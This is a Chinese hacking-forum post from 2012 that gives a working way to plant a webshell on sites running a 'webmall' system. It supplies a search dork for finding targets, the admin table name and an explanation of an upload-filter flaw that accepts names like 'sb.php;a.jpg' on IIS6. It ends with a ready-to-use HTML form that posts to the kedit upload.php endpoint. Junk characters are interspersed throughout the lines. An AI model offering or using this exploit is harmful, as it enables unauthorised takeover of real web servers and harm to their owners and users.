关键字:inurl:webmall/detail.php?id
8 Q# I( ~) o5 d% U( _
4 ]8 j1 J7 {) P; g+ u+ J# y: R数据表:pwn_base_admin
7 M* d# ~5 `; N9 c! \1 d# R ; O" d+ ^/ d" B" n* Q# U
关于拿shell
* @! n4 ?0 @6 r# x+ K% }" U 2 T/ g7 D+ H/ _# D2 F; Q) s
首先登录后台admin.php
1 m9 O# u" d* k+ s/ x
7 w- ^2 H% s) J& b8 s3 l+ e; Y/ r" D看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。
- V# `' D& ?/ f/ R$ ]换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
* J- O! B |% L2 H9 a# ~+ d然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
5 B$ X& O+ p' l0 ?( X1 ?0 x<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
- d% M% P4 [/ `; F1 C<input type="text" name="fileName" value="sb.php;a.jpg" /> # G: ^: y- ^% W7 |9 k
<input type="hidden" name="attachPath" value="news/pics/" />
+ [% e6 G4 o. Z$ H$ c: x" L: o<input type="file" name="fileData" size="14" /></td> . v, k% j( ?: h E3 `9 H0 ^8 X6 ]
<input type="submit" name="button" value="确定" />
3 G/ h1 z+ r; q# u& T) p</form>! o3 A1 r0 b6 P, i9 {
6 N5 X+ O7 B6 _) S# [首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。9 @, y; D' R% ^: s/ _ C7 Y3 ^: l
/ j! E! v* Y `# W |
发表于 2012-11-9 20:52:15
收藏
支持
反对